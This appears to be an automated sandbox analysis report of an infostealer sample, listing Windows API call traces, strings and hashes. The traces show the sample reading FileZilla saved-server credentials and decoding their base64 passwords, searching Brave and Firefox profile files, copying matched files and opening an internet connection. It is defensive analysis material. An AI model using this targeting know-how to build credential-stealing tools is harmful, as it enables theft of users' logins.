                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73C84
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F73C8F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73CB7
                                    • lstrlen.KERNEL32(00F91794), ref: 00F73CC9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73CE8
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F73CF4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73D1A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F73D47
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F73D52
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73D79
                                    • lstrlen.KERNEL32(00F91794), ref: 00F73D8B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73DAD
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F73DB9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73DE2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73E11
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F73E1C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73E43
                                    • lstrlen.KERNEL32(00F91794), ref: 00F73E55
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73E77
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F73E83
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73EAC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73EDB
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F73EE6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73F0D
                                    • lstrlen.KERNEL32(00F91794), ref: 00F73F1F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73F41
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F73F4D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73F75
                                    • lstrlen.KERNEL32(?), ref: 00F73F89
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73FA9
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F73FB7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F73FE0
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7401F
                                    • lstrlen.KERNEL32(00A9CF08), ref: 00F7402E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74056
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F74061
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7408A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F740CE
                                    • lstrcat.KERNEL32(00000000), ref: 00F740DB
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00F742D9
                                    • FindClose.KERNEL32(00000000), ref: 00F742E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 1006159827-1013718255
                                    • Opcode ID: 451bb54e85ae50e7ce9283122bd777881f5c55d3a9dd5abee62b7c82afa729f3
                                    • Instruction ID: ad9c3ff41171df0905e842edee8f4c2dcafe20f223325cddf4cf1a1686a0529e
                                    • Opcode Fuzzy Hash: 451bb54e85ae50e7ce9283122bd777881f5c55d3a9dd5abee62b7c82afa729f3
                                    • Instruction Fuzzy Hash: AA62C871D1161AABCB35AFA4CC49AAE77B9BF44314F048139F82993244DB38DD41FB92
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F76995
                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00F769C8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76A02
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76A29
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F76A34
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76A5D
                                    • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00F76A77
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76A99
                                    • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00F76AA5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76AD0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76B00
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00F76B35
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F76B9D
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F76BCD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 313953988-555421843
                                    • Opcode ID: 65a33d4ccb9d7cad2695fdf215560a1eeae4dc1ed5daa8ca3f6253611d06a15a
                                    • Instruction ID: a518fa8148687a0d07dd6548a2144c1c532d142385aac4f02a3c6cd0bb355c18
                                    • Opcode Fuzzy Hash: 65a33d4ccb9d7cad2695fdf215560a1eeae4dc1ed5daa8ca3f6253611d06a15a
                                    • Instruction Fuzzy Hash: 5E421870E11605AFDB21EBB0DC89EAE7779AF44314F088429F525E7241DB78DC41EBA2
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6DBC1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DBE4
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6DBEF
                                    • lstrlen.KERNEL32(00F94CA8), ref: 00F6DBFA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DC17
                                    • lstrcat.KERNEL32(00000000,00F94CA8), ref: 00F6DC23
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DC4C
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6DC8F
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6DCBF
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 00F6DCD0
                                    • StrCmpCA.SHLWAPI(?,00F917A0), ref: 00F6DCF0
                                    • StrCmpCA.SHLWAPI(?,00F917A4), ref: 00F6DD0A
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F6DD1D
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6DD47
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DD70
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6DD7B
                                    • lstrlen.KERNEL32(00F91794), ref: 00F6DD86
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DDA3
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6DDAF
                                    • lstrlen.KERNEL32(?), ref: 00F6DDBC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DDDF
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F6DDED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DE19
                                    • lstrlen.KERNEL32(00F91794), ref: 00F6DE3D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6DE6F
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6DE7B
                                    • lstrlen.KERNEL32(00A98F68), ref: 00F6DE8A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DEB0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6DEBB
                                    • lstrlen.KERNEL32(00F91794), ref: 00F6DEC6
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6DEE6
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6DEF2
                                    • lstrlen.KERNEL32(00A991B8), ref: 00F6DF01
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DF27
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6DF32
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DF5E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DFA5
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6DFB1
                                    • lstrlen.KERNEL32(00A98F68), ref: 00F6DFC0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DFE9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6DFF4
                                    • lstrlen.KERNEL32(00F91794), ref: 00F6DFFF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E022
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6E02E
                                    • lstrlen.KERNEL32(00A991B8), ref: 00F6E03D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E063
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6E06E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E09A
                                    • StrCmpCA.SHLWAPI(?,Brave), ref: 00F6E0CD
                                    • StrCmpCA.SHLWAPI(?,Preferences), ref: 00F6E0E7
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6E11F
                                    • lstrlen.KERNEL32(00A9CF08), ref: 00F6E12E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E155
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F6E15D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E19F
                                    • lstrcat.KERNEL32(00000000), ref: 00F6E1A9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E1D0
                                    • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00F6E1F9
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6E22F
                                    • lstrlen.KERNEL32(00A99108), ref: 00F6E23D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E261
                                    • lstrcat.KERNEL32(00000000,00A99108), ref: 00F6E269
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00F6E988
                                    • FindClose.KERNEL32(00000000), ref: 00F6E997
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                    • String ID: Brave$Preferences$\Brave\Preferences
                                    • API String ID: 1346089424-1230934161
                                    • Opcode ID: 31aa6c924176015dda4e488e39312373f0287c4d1c8b8eaadb94a9cde35333cc
                                    • Instruction ID: 912d5e6604f8ff5f4eaaeb2b58a0381165ae0fccdd1c60352d5e5e919d6abc7c
                                    • Opcode Fuzzy Hash: 31aa6c924176015dda4e488e39312373f0287c4d1c8b8eaadb94a9cde35333cc
                                    • Instruction Fuzzy Hash: E2529071E1160A9BDB25EFB4DD89AAE77B9AF44314F084038F825D7245DB38DC41EBA0
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F660FF
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F66152
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F66185
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F661B5
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F661F0
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F66223
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00F66233
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$InternetOpen
                                    • String ID: "$------
                                    • API String ID: 2041821634-2370822465
                                    • Opcode ID: 57970d5b1fcdafa98da3c6e35d09a6eeba2ecece79241adc95f482d324318bf2
                                    • Instruction ID: 3261df052a3a2da4da70dfea266ebaea63e37b63f359e0e723d305bbc1a25ace
                                    • Opcode Fuzzy Hash: 57970d5b1fcdafa98da3c6e35d09a6eeba2ecece79241adc95f482d324318bf2
                                    • Instruction Fuzzy Hash: E3529171D116199BDB21EFB4DC49BAEB7B9AF44314F184028F825E7241DB78EC41EBA0
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F76B9D
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F76BCD
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F76BFD
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F76C2F
                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00F76C3C
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F76C43
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00F76C5A
                                    • lstrlen.KERNEL32(00000000), ref: 00F76C65
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76CA8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76CCF
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 00F76CE2
                                    • lstrlen.KERNEL32(00000000), ref: 00F76CED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76D30
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76D57
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00F76D6A
                                    • lstrlen.KERNEL32(00000000), ref: 00F76D75
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76DB8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76DDF
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00F76DF2
                                    • lstrlen.KERNEL32(00000000), ref: 00F76E01
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76E49
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76E71
                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00F76E94
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00F76EA8
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00F76EC9
                                    • LocalFree.KERNEL32(00000000), ref: 00F76ED4
                                    • lstrlen.KERNEL32(?), ref: 00F76F6E
                                    • lstrlen.KERNEL32(?), ref: 00F76F81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 2641759534-2314656281
                                    • Opcode ID: 709c49fffd904998da55318ce9040576ca709e21b70795f8407536749d0ff150
                                    • Instruction ID: 02cfbeffb255a8846b8ebde4406c3beefb71e6ff019f6a68e9e6be4714c4c903
                                    • Opcode Fuzzy Hash: 709c49fffd904998da55318ce9040576ca709e21b70795f8407536749d0ff150
                                    • Instruction Fuzzy Hash: E4020670E11609AFDB21EBB0CC49E9E7B79AF44714F088429F925E7241DB78DC41E7A2
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F74B51
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74B74
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F74B7F
                                    • lstrlen.KERNEL32(00F94CA8), ref: 00F74B8A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74BA7
                                    • lstrcat.KERNEL32(00000000,00F94CA8), ref: 00F74BB3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74BDE
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 00F74BFA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 2567437900-3783873740
                                    • Opcode ID: 8ef9c3b1f88871693ad5c6474b93e263c8466ebdc7aeae787131742bf56f9a27
                                    • Instruction ID: c302dcdb95aa912c12d68b9aa655d2b8c61a0545f76a1633066f37145175b342
                                    • Opcode Fuzzy Hash: 8ef9c3b1f88871693ad5c6474b93e263c8466ebdc7aeae787131742bf56f9a27
                                    • Instruction Fuzzy Hash: F1926E70E016058FDB28CF29C948B69B7E5BF44728F19C0AEE81D9B291D775EC82DB41
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F71291
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F712B4
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F712BF
                                    • lstrlen.KERNEL32(00F94CA8), ref: 00F712CA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F712E7
                                    • lstrcat.KERNEL32(00000000,00F94CA8), ref: 00F712F3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7131E
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 00F7133A
                                    • StrCmpCA.SHLWAPI(?,00F917A0), ref: 00F7135C
                                    • StrCmpCA.SHLWAPI(?,00F917A4), ref: 00F71376
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F713AF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F713D7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F713E2
                                    • lstrlen.KERNEL32(00F91794), ref: 00F713ED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7140A
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F71416
                                    • lstrlen.KERNEL32(?), ref: 00F71423
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71443
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F71451
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7147A
                                    • StrCmpCA.SHLWAPI(?,00A9CF50), ref: 00F714A3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F714E4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7150D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71535
                                    • StrCmpCA.SHLWAPI(?,00A9DD70), ref: 00F71552
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F71593
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F715BC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F715E4
                                    • StrCmpCA.SHLWAPI(?,00A9CF38), ref: 00F71602
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71633
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7165C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F71685
                                    • StrCmpCA.SHLWAPI(?,00A9CF68), ref: 00F716B3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F716F4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7171D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71745
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F71796
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F717BE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F717F5
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00F7181C
                                    • FindClose.KERNEL32(00000000), ref: 00F7182B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                    • String ID:
                                    • API String ID: 1346933759-0
                                    • Opcode ID: 1fd3c44eb7d65a1afda8078c71d54134ea1e1370cab6a5bf7dddd438fd73f253
                                    • Instruction ID: 4688c654774906d862d32bd759621ca5e4b21b3462869ddc63692c07e8a3979c
                                    • Opcode Fuzzy Hash: 1fd3c44eb7d65a1afda8078c71d54134ea1e1370cab6a5bf7dddd438fd73f253
                                    • Instruction Fuzzy Hash: 5712847191160A8BDB24EF78DC89AAE77B8BF44314F04853DF85AD7240DB34DC45AB91
                                    APIs
                                    • wsprintfA.USER32 ref: 00F7CBFC
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00F7CC13
                                    • lstrcat.KERNEL32(?,?), ref: 00F7CC5F
                                    • StrCmpCA.SHLWAPI(?,00F917A0), ref: 00F7CC71
                                    • StrCmpCA.SHLWAPI(?,00F917A4), ref: 00F7CC8B
                                    • wsprintfA.USER32 ref: 00F7CCB0
                                    • PathMatchSpecA.SHLWAPI(?,00A991D8), ref: 00F7CCE2
                                    • CoInitialize.OLE32(00000000), ref: 00F7CCEE
                                      • Part of subcall function 00F7CAE0: CoCreateInstance.COMBASE(00F8B110,00000000,00000001,00F8B100,?), ref: 00F7CB06
                                      • Part of subcall function 00F7CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00F7CB46
                                      • Part of subcall function 00F7CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 00F7CBC9
                                    • CoUninitialize.COMBASE ref: 00F7CD09
                                    • lstrcat.KERNEL32(?,?), ref: 00F7CD2E
                                    • lstrlen.KERNEL32(?), ref: 00F7CD3B
                                    • StrCmpCA.SHLWAPI(?,00F8CFEC), ref: 00F7CD55
                                    • wsprintfA.USER32 ref: 00F7CD7D
                                    • wsprintfA.USER32 ref: 00F7CD9C
                                    • PathMatchSpecA.SHLWAPI(?,?), ref: 00F7CDB0
                                    • wsprintfA.USER32 ref: 00F7CDD8
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00F7CDF1
                                    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00F7CE10
                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00F7CE28
                                    • CloseHandle.KERNEL32(00000000), ref: 00F7CE33
                                    • CloseHandle.KERNEL32(00000000), ref: 00F7CE3F
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F7CE54
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7CE94
                                    • FindNextFileA.KERNEL32(?,?), ref: 00F7CF8D
                                    • FindClose.KERNEL32(?), ref: 00F7CF9F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                    • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 3860919712-2388001722
                                    • Opcode ID: 1898967f1269cfddea06ff641b4dcc4dbd47abfa08063d11fbd35e4d1b0a3a9d
                                    • Instruction ID: 4e785f6a9713aa3a43fb74b3d614dd8bf172014b81f85bae21403cdffd4e5adc
                                    • Opcode Fuzzy Hash: 1898967f1269cfddea06ff641b4dcc4dbd47abfa08063d11fbd35e4d1b0a3a9d
                                    • Instruction Fuzzy Hash: 6EC192719002099FDB64DF64DC49EEE77B9BF48300F0485A9F92997184EB34AE84DFA1
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F71291
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F712B4
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F712BF
                                    • lstrlen.KERNEL32(00F94CA8), ref: 00F712CA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F712E7
                                    • lstrcat.KERNEL32(00000000,00F94CA8), ref: 00F712F3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7131E
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 00F7133A
                                    • StrCmpCA.SHLWAPI(?,00F917A0), ref: 00F7135C
                                    • StrCmpCA.SHLWAPI(?,00F917A4), ref: 00F71376
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F713AF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F713D7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F713E2
                                    • lstrlen.KERNEL32(00F91794), ref: 00F713ED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7140A
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F71416
                                    • lstrlen.KERNEL32(?), ref: 00F71423
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71443
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F71451
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7147A
                                    • StrCmpCA.SHLWAPI(?,00A9CF50), ref: 00F714A3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F714E4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7150D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71535
                                    • StrCmpCA.SHLWAPI(?,00A9DD70), ref: 00F71552
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F71593
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F715BC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F715E4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F71796
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F717BE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F717F5
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00F7181C
                                    • FindClose.KERNEL32(00000000), ref: 00F7182B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                    • String ID:
                                    • API String ID: 1346933759-0
                                    • Opcode ID: 860d80fed9a4d93b7628426753ae17b9322033359b507b39eb8d31047ca31759
                                    • Instruction ID: 8534496a7a9e254ded5c64881d04ba2f4e12e230dd9d3361cfebb032124f634c
                                    • Opcode Fuzzy Hash: 860d80fed9a4d93b7628426753ae17b9322033359b507b39eb8d31047ca31759
                                    • Instruction Fuzzy Hash: E5C1C37191160A8BDB65EF78DC89AAE77B8BF44314F044039F859D3241DB38DC49EB92
                                    APIs
                                    • memset.MSVCRT ref: 00F69790
                                    • lstrcat.KERNEL32(?,?), ref: 00F697A0
